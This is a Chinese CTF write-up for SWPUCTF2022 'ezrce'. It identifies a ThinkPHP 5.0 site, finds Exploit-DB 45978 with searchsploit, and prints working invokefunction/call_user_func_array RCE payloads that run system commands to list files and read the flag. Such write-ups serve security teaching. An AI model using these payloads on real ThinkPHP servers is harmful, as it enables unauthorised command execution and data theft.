SWPUCTF2022-ezrce-wp

分析

页面打开为空

访问robots.txt 有

1
2
3

User-agent: *
Disallow:
  -  /NSS/index.php/

访问/NSS/index.php/ ，页面显示

:)

ThinkPHP V5
十年磨一剑 - 为API开发设计的高性能框架
[ V5.0 版本由 七牛云 独家赞助发布 ]

好熟悉的界面 似曾相识啊

可见系统使用ThinkPHP v5.0

查询已知漏洞及攻击方式

$ searchsploit thinkphp

-------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ---------------------------------
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)           | linux/remote/48333.rb
ThinkPHP 2.0 - 'index.php' Cross-Site Scripting               | php/webapps/33933.txt
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution                | php/webapps/45978.txt		# 选择这个
ThinkPHP 5.X - Remote Command Execution                       | php/webapps/46150.txt
-------------------------------------------------------------- ---------------------------------

$ searchsploit -p 45978.txt		# -p 上面Path中的文件名

Exploit: ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/45978
     Path: /usr/share/exploitdb/exploits/php/webapps/45978.txt
    Codes: N/A
 Verified: False
File Type: ASCII text

$ cat /usr/share/exploitdb/exploits/php/webapps/45978.txt

# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit
http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'		# 明显第二个参数即为执行的命令

攻击

1
2

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat $(find / -name flag)

本博客采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.

Prev Home Next